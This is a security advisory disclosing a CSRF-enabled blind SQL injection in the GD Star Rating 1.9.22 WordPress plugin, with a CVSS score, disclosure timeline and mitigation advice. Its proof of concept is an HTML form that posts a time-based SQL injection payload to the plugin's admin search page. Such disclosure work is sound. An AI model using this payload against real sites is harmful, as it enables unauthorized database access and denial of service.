CSRF and blind SQL injection in GD Star Rating 1.9.22


Last revised:

This plugin is vulnerable to SQL injection. Carrying out an SQL injection requires access to an administrator account. However, the form contains no CSRF protection so an attacker may not need direct access to an account to perform denial of service or to compromise sensitive data.

Current state: Reported

CVSS Summary

CVSS base scores for this vulnerability
Score 8.5 High
Vector Network
Complexity Low
Authentication Single
Confidentiality Complete
Integrity None
Availability Complete
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Proof of concept (see code/adm/db.php at line 154):

<form action="http://localhost/wp-admin/admin.php?page=gd-star-rating-stats" method="POST">
  <input type="text" name="s" value="' and sleep(5) = '">
  <input type="text" name="gdsr_search" value="Search Posts">
  <input type="submit">

Advisory timeline

  • 2013-07-25: Identified
  • 2014-02-18: Reported to
  • 2014-03-28: No response received. Published.
  • 2014-03-31: Amended to remove confusing reference to XSS

Mitigation/further actions

Disable the plugin until a fix is released.